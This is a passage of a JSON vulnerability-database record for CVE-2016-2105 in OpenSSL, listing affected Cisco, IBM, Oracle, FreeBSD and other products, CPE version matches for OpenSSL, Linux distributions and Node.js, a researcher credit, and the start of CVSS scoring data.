        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.0"
      },
      {
        "model": "10.3-release-p2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified ip phone 9.4.2sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9951"
      },
      {
        "model": "local collector appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2.12"
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.1"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.32"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.0"
      },
      {
        "model": "content security appliance updater servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p29",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "netezza platform software 7.2.1.2-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "connected analytics for collaboration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.1.1"
      },
      {
        "model": "multicast manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p23",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "telepresence ex series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.16"
      },
      {
        "model": "mac os security update",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x2016"
      },
      {
        "model": "10.1-release-p16",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "jazz reporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.1"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.1"
      },
      {
        "model": "security appscan enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.8"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.30.4-12"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.0"
      },
      {
        "model": "webex node for mcs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified communications manager session management edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "emergency responder 10.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "qradar siem mr2 patch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.113"
      },
      {
        "model": "nexus",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "900012.0"
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "9.3-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "video surveillance ptz ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2"
      },
      {
        "model": "virtualization experience media engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.7(0)"
      },
      {
        "model": "telepresence serial gateway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "9.3-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "project openssl 1.0.2c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "webex meetings server 2.5mr2",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "virtual security gateway for microsoft hyper-v",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "services analytic platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jabber for apple ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.7"
      },
      {
        "model": "unified ip phone series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "79009.4(2)"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "89610"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.2.17"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.12"
      },
      {
        "model": "tivoli netcool system service monitors",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.2"
      },
      {
        "model": "unified series ip conference phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "88310"
      },
      {
        "model": "video surveillance media server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.9"
      },
      {
        "model": "unified communications manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "security network controller 1.0.3376m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "agent for openflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.1.5"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.28"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.7"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.27"
      },
      {
        "model": "project openssl 1.0.2h",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.33"
      },
      {
        "model": "10.2-release-p16",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "virtual security gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(1)"
      },
      {
        "model": "unified attendant console enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified contact center express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3379"
      },
      {
        "model": "policy suite",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.22"
      },
      {
        "model": "project openssl 1.0.2b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "prime data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "unified communications manager session management edition",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "videoscape control suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "53000"
      },
      {
        "model": "prime access registrar",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.1"
      },
      {
        "model": "anyres live",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.4.5"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.3.0"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.0"
      },
      {
        "model": "9.3-release-p34",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(1)"
      },
      {
        "model": "tivoli provisioning manager for images system edition build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x7.1.1.20290.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.42"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.10"
      },
      {
        "model": "jabber software development kit",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.7"
      },
      {
        "model": "unified contact center express",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "webex meetings server mr1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "telepresence mx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.99.2"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.1"
      },
      {
        "model": "jazz reporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "telepresence isdn gw mse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "83210"
      },
      {
        "model": "telepresence profile series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "abyp-2t-0s-2l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "visual quality experience tools server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "prime access registrar",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.2"
      },
      {
        "model": "mysql enterprise backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.1"
      },
      {
        "model": "nexus series switches 7.3.1dx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7000"
      },
      {
        "model": "asa cx and cisco prime security manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.5.4.3"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "project openssl 1.0.1l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "im and presence service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.35"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.5"
      },
      {
        "model": "9.3-release-p29",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "firesight system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2.1"
      },
      {
        "model": "management appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.2"
      },
      {
        "model": "tivoli provisioning manager for images system edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x7.1.1.0"
      },
      {
        "model": "unity connection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.0.1"
      },
      {
        "model": "cloud object store",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "anyconnect secure mobility client for os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "x4.0"
      },
      {
        "model": "project openssl 1.0.1h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(2.13900.9)"
      },
      {
        "model": "ip interoperability and collaboration system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(0.98000.88)"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.1"
      },
      {
        "model": "project openssl 1.0.1p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "89757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2105"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.6.30",
                "versionStartIncluding": "5.6.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.7.12",
                "versionStartIncluding": "5.7.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.11.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.1.2",
                "versionStartIncluding": "4.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nodejs:node.js:6.0.0:*:*:*:-:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.11.1",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "0.12.14",
                "versionStartIncluding": "0.12.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "0.10.45",
                "versionStartIncluding": "0.10.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.4",
                "versionStartIncluding": "4.2.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-2105"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Guido Vranken",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2016-2105",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
